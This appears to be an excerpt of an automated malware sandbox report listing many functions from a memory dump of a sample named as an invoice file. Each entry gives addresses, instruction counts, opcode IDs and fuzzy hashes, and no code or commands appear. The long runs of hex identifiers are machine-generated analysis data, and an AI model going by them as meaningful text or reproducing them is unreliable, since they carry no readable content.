                                            • Instruction ID: 51dc347a3646f77dae6faa6c760f32f2df423516b8f60671e86cff7bf51ef966
                                            • Opcode Fuzzy Hash: 7513e90237344e7c7b42d29bfb239360efe43652ce1c6585d2583b48c52a18c4
                                            • Instruction Fuzzy Hash: 1C41E6707016119FEB2DDBADC894BBBBB9AEF90A24F088219E955C73C0DB34D841C791
                                            Function 0110CBF0 Relevance: .1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab25972eaa4fdfffb325a7ca33530c070701f7861d16e7007b19ca6842fa33aa
                                            • Instruction ID: 7eb5f499fb385a344eaf64fefc08d04f3859a81f67b1902247f67d7dfda7642a
                                            • Opcode Fuzzy Hash: ab25972eaa4fdfffb325a7ca33530c070701f7861d16e7007b19ca6842fa33aa
                                            • Instruction Fuzzy Hash: 9C51CEB1D0021ADFCB29DFA9C980A9EBBB9FF48314B518669E555A3340D770AE41CFD0
                                            Function 010BA430 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dbe44d69cc7ed0c64eec40d8d872c5beffb01f5fcaef77bd9ede788ff5131e62
                                            • Instruction ID: cfbb572d84dc55d0cf004de98880d7d2af0984a41dbdc5653a1bd6246bb94245
                                            • Opcode Fuzzy Hash: dbe44d69cc7ed0c64eec40d8d872c5beffb01f5fcaef77bd9ede788ff5131e62
                                            • Instruction Fuzzy Hash: B0411371740205DBDB29FF69A8C1BEE37B4EB58718F00007CEA929B351DB729C448B50
                                            Function 0114A9D3 Relevance: .1, Instructions: 139COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction ID: 4a13e8cd1e51306207ef4931ccff348a83ea995baea9582b764c907964c99e40
                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction Fuzzy Hash: 5D412C31645706AFDB2DCF58D890A6AB7A9FF80614B16463EE9538B240EB30FC04C7D0
                                            Function 010B01F8 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                            • Instruction ID: 1d601ce0aea549c96abf11fccee889a7396de15f3be0524eeba4b97597d864a6
                                            • Opcode Fuzzy Hash: 192a418e5a5ab59a6c7fae25537085f52d6e6048885e942a6884c9a1bfead6ab
                                            • Instruction Fuzzy Hash: FF41DC31A01219DBDB14DF98C480AEFBBB5BF48B00F1481AAF999F7244E7359D45CBA4
                                            Function 010AEBFC Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eba20fb5d4eedc3afd6000bad5b397a518fa05f17c2c61dd5833f92da9d7b23b
                                            • Instruction ID: ce6caf394504e1c914870db4fca86148a5501f073eed5d9e577fe8741a7e04d9
                                            • Opcode Fuzzy Hash: eba20fb5d4eedc3afd6000bad5b397a518fa05f17c2c61dd5833f92da9d7b23b
                                            • Instruction Fuzzy Hash: 1141C0712043069FDB24EF69C884A5BBBE6FB88224F404979E5D6C7211EB35E8458B90
                                            Function 010C2750 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction ID: f094d93fc15a3bf6d82757ca5333926a08a3d2dedccc8f97266540643a3b0ad1
                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction Fuzzy Hash: 5C516A75A00219CFCB55CF98C481AAEF7F2FF84710F2481A9DA99A7751D734AE42CB90
                                            Function 01086154 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                            • Instruction ID: 662f95352b62678dcabdd692732675a23f87d3241ac11680769e3457974c79a5
                                            • Opcode Fuzzy Hash: 2db7b2751a678c9151427cb3489b8df6ce113ce024ddf345665887f4ebd3dab9
                                            • Instruction Fuzzy Hash: 1051E470A04A06DFEB65AB28CC14BE8BBF1EB11314F0582E5E5E9A73D1DB759981CF40
                                            Function 01080BCD Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ec23a04f1a1f7b7a9187e0088bd281a479a6b36fb870f228c4146fe0e30bb789
                                            • Instruction ID: 92103330d6f3aeb8f64aed7032737995a2cf87e4c87b595fe1950b4654521818
                                            • Opcode Fuzzy Hash: ec23a04f1a1f7b7a9187e0088bd281a479a6b36fb870f228c4146fe0e30bb789
                                            • Instruction Fuzzy Hash: 34418F71A0432C9FDF61EF68C940BEE77B4AF59750F0100A9E988AB241DB749E84CF91
                                            Function 0114866E Relevance: .1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction ID: 9fdb68336f4e029476be2308cf32e4c154c884008050fba57c9f8ef2398196b3
                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction Fuzzy Hash: 1241B775B00106ABEB1DDFD9CC94ABFBBBAAF85A54F144069E904A7341D770DD01C760
                                            Function 01080887 Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e4b3db2ab83a3d6bbe8635bda0ec3d55db4dbb5d696b125a06f77dae0773f07b
                                            • Instruction ID: 9afd840b731b73d6ad5a0d71c61dcbf09c236b91eca5f5017b67422c0fc45f13
                                            • Opcode Fuzzy Hash: e4b3db2ab83a3d6bbe8635bda0ec3d55db4dbb5d696b125a06f77dae0773f07b
                                            • Instruction Fuzzy Hash: 1641E370604702DFE725EF28C490A26BBF9FF49314B108A6DE5DB87A55E730E849CB90
                                            Function 010AA470 Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                            • Instruction ID: 1c0bec5d6de3c5ef97a4aaecb471d7906c9166e99890f2bb60aecf17eda5bf96
                                            • Opcode Fuzzy Hash: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                            • Instruction Fuzzy Hash: 1D419E31A45209CFDB25DFACC4547ED7BF0BB58350F4401A9D4A1AB2D1DB349980CBA5
                                            Function 01088BF0 Relevance: .1, Instructions: 124COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc6dcee1248fe9a2753c6bc3600e407d8955d480c22e1fb9851c4cd890aa4f9d
                                            • Instruction ID: d0aa8a27ae8d0d1efa6ee229de21695e5bc5e7f26b493effcd2d18908288c2b8
                                            • Opcode Fuzzy Hash: cc6dcee1248fe9a2753c6bc3600e407d8955d480c22e1fb9851c4cd890aa4f9d
                                            • Instruction Fuzzy Hash: 51412132904206CFDB28AF5DC880A9EBBF5FB94704F54C02AD9909BB59C735D882CF90
                                            Function 01078918 Relevance: .1, Instructions: 123COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b5249c650ef5d8002880be0540eadc458cbdcca4b7ba33631e6514538bcc178
                                            • Instruction ID: 5ef89dd400258d819eeff81d3225e3405d5aa91506fd63bb48e450f9fb858c5c
                                            • Opcode Fuzzy Hash: 9b5249c650ef5d8002880be0540eadc458cbdcca4b7ba33631e6514538bcc178
                                            • Instruction Fuzzy Hash: AC4159319087069ED312DF688840AABB7E8BF88B54F45492BF9C4D7250E731DE058BA7
                                            Function 0107A020 Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction ID: ab6b045f3613128f319aeb3b7b51925f2ad561a22f8ca262287168a1eaa9032b
                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction Fuzzy Hash: D4412731F00311DBEB62DE6984407FEBBA1EB51764F1A84EAF9C58B240D6329D80CBD4
                                            Function 010809AD Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac608be18374960cce65bbe84647d4e6cbb2fc64f45575dc086a81f48ab2d63d
                                            • Instruction ID: 19bcfe280e30b32c98eaa7fe5f42b0e8b5751d9d76eb4b9265251e207c721a31
                                            • Opcode Fuzzy Hash: ac608be18374960cce65bbe84647d4e6cbb2fc64f45575dc086a81f48ab2d63d
                                            • Instruction Fuzzy Hash: 3D416571604601EFD721EF18C840B6ABBF4EF58314F248A6AE4D98B251E771E946CB90
                                            Function 010B0710 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction ID: b0c61bb9f1ae7ee18abaf9e591daa6be8fdb7ca1c242097f0327b28850169221
                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction Fuzzy Hash: 2F412571A00605EFDB24CF98C9D0AAEBBF5FF18700B10496DE596D7694D730AA44CF90
                                            Function 0108262C Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f6b68510064871d8f3f7767500711f663fd70a37461825f4a22aea7ea8f4347f
                                            • Instruction ID: 648ee739bf575623eb9ba599886fd25bf2c632f97d75794fb4f5d6e2236ce9cc
                                            • Opcode Fuzzy Hash: f6b68510064871d8f3f7767500711f663fd70a37461825f4a22aea7ea8f4347f
                                            • Instruction Fuzzy Hash: EE41AEB0509B05DFDB65FF29C940A99B7F1FF58314F1082AAC4D69B2A1DB309981CB51
                                            Function 010BC8F9 Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea492c80e1405e8b3165f842b05c57c865f51ff4af8757c3d1d062cf95e876c2
                                            • Instruction ID: d48a77e99d8c588a0a224c73acbc8c44b3f123536c29a7ab575b45fd209b52e7
                                            • Opcode Fuzzy Hash: ea492c80e1405e8b3165f842b05c57c865f51ff4af8757c3d1d062cf95e876c2
                                            • Instruction Fuzzy Hash: 0931A9B1A00345DFEB56CFA8C580799BBF0FB09728F2081AED559EB251D7329902CF90
                                            Function 011007C3 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8aab121bc3e8ff9941dd0cf33152152872debc7a655b699814a8cb861b53540f
                                            • Instruction ID: d9df52abe7075f6123fb36de268693258a14ae34080eb441c7cd59cbc8fe4bd0
                                            • Opcode Fuzzy Hash: 8aab121bc3e8ff9941dd0cf33152152872debc7a655b699814a8cb861b53540f
                                            • Instruction Fuzzy Hash: A9419E719083059FD365DF29C845B9BBBE8FF88764F004A2EF5A8C7291D7709944CB92
                                            Function 010780A0 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0746e22cf14fee66db91a546c3b603ab0336465f8dccedf1b9fa88540d5c3095
                                            • Instruction ID: 067d49d28163d574530807b60fb4832f284848dae9d3ace1387fe85cd563f5cb
                                            • Opcode Fuzzy Hash: 0746e22cf14fee66db91a546c3b603ab0336465f8dccedf1b9fa88540d5c3095
                                            • Instruction Fuzzy Hash: BF41F071E05616EFCB01DF18D884AACBBB9BF54760F20C26AD895A7280DB30ED41CBD4
                                            Function 011005A7 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                            • Instruction ID: 8aa6f1aeb55a24096d72b574122ef4a8759b4ff5c12e03cbb1378b19bfcd5dac
                                            • Opcode Fuzzy Hash: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                            • Instruction Fuzzy Hash: 5741E372A046469FC325DF68CC50BAAB7E5FFC8740F14462DF9948B680E770E904CBA6
                                            Function 01084859 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de3167eaa95275f3e8d98e172e724b324791cebe467d68a85e1b8de83864b1d0
                                            • Instruction ID: 654c2a0bed0696a369bd2c16caa5644763b91fdd6c58d641e36901c59fff5018
                                            • Opcode Fuzzy Hash: de3167eaa95275f3e8d98e172e724b324791cebe467d68a85e1b8de83864b1d0
                                            • Instruction Fuzzy Hash: 2941BE702083068BDB35EF2CD894B2ABBE9AF80364F1544ADE6D5CB291DB74D851CB91
                                            Function 01078B50 Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b69d753d1cddbd2157fdc7c3f3e16d1586f495f2615e2b3287e0e8bda166d5cd
                                            • Instruction ID: 085ce25cf4405320150f149d8a37e3ae291f23f2b9de27da5ab94d6a0069be5f
                                            • Opcode Fuzzy Hash: b69d753d1cddbd2157fdc7c3f3e16d1586f495f2615e2b3287e0e8bda166d5cd
                                            • Instruction Fuzzy Hash: F7419DB1E01609CFCB14DF69C9849ADBBF1FF98324B20C66BD4A6A7260DB349941CF44
                                            Function 010902E1 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction ID: 947887ab229d66f7bf740b5c592d3c8d16fad31f2259e5e9d9f5389796a98961
                                            • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                            • Instruction Fuzzy Hash: 2E31E031A04249AFDF629B69CC44BDEBBEDAF14350F04C1A6F899D7256C7749884CBA0
                                            Function 0112E3DB Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 123189d5d54ab574cae002735d8f4d9fb411eeb0fbb6133f3785daae66bb8143
                                            • Instruction ID: 9d2d5f19b87ae2a77f361b1767be1cc988551390533a28514d99ccb0fe65d8ce
                                            • Opcode Fuzzy Hash: 123189d5d54ab574cae002735d8f4d9fb411eeb0fbb6133f3785daae66bb8143
                                            • Instruction Fuzzy Hash: CD31D931B41756ABDB269F658C90FEF7AB8AB58B50F000028F600EB391DBA5DC00C7E0
                                            Function 01134B4B Relevance: .1, Instructions: 104COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a8c56d6225abfb7df2b4a9405477eb8fe0523386c75c3332fb1ac49bcd504dfc
                                            • Instruction ID: 4e746af6676c54c0930f87288b08e1d5ec747bcca64d6dbca102f4d6ae0aef54
                                            • Opcode Fuzzy Hash: a8c56d6225abfb7df2b4a9405477eb8fe0523386c75c3332fb1ac49bcd504dfc
                                            • Instruction Fuzzy Hash: 9E31E1322056018FD729DF19D890E6ABBF5FBC1320F0A447DE9998BB59D730A844CB91
                                            Function 01084260 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                            • Instruction ID: 3db03d3d63a13d049aef329aa8604dd96be65c1459993aec063eab0e7af10283
                                            • Opcode Fuzzy Hash: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                            • Instruction Fuzzy Hash: 9041BD71204B46DFD766DF29C884BDA7BE5AB58314F00846DFAD9CB250C7B4E804CB50
                                            Function 01134BB0 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f33e0c204101bcd099fac529c5a8cc4f5056d3753ad6a3c73d3266916d4015d0
                                            • Instruction ID: 8f05ff5436458180ee8a58dce23d3a82d22b00cd6317569bbd7df261885f7479
                                            • Opcode Fuzzy Hash: f33e0c204101bcd099fac529c5a8cc4f5056d3753ad6a3c73d3266916d4015d0
                                            • Instruction Fuzzy Hash: 8931AF716042019FE728DF29C890A2AB7E5FBC4720F05456DF9A99BB58D730EC44CB91
                                            Function 010FEB1D Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f6becb9de5a1e60424c4ecf6b0953285b8427c98e9da375e711253ce5bf0463
                                            • Instruction ID: 0a70f7de784948a8dc8166524ee21b3de926dad24b02e67d7ba5dcb20e5c7ca0
                                            • Opcode Fuzzy Hash: 9f6becb9de5a1e60424c4ecf6b0953285b8427c98e9da375e711253ce5bf0463
                                            • Instruction Fuzzy Hash: AC3106316017CA9BF326976CCD59B567BD8BB45744F1E00E8ABC19BAF2DB28D841C260
                                            Function 011461C3 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                            • Instruction ID: e662d1fe9150a44f7080cc2430b4ec28dd94349bd6039c5edaa99b3192040a36
                                            • Opcode Fuzzy Hash: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                            • Instruction Fuzzy Hash: 8E31E175A0021ABBDB19DF98CC80FAEB7B5FB49B44F454168E900EB244D770ED40CBA4
                                            Function 0112483A Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e21896e1210c0a8e29905149f992b271a0df513c992c919f5009a9e732aa0789
                                            • Instruction ID: 30582795ff6cba1f54d8e89eeb3bc0f8f2167cb5e43ebc824e726a47b6adf1eb
                                            • Opcode Fuzzy Hash: e21896e1210c0a8e29905149f992b271a0df513c992c919f5009a9e732aa0789
                                            • Instruction Fuzzy Hash: 2F314176A4012DABCF25DF54DC88BDEBBBAAB9C750F1440A5E508A7250DB30DE91CF90
                                            Function 010AEB20 Relevance: .1, Instructions: 96COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2259640251.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1050000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
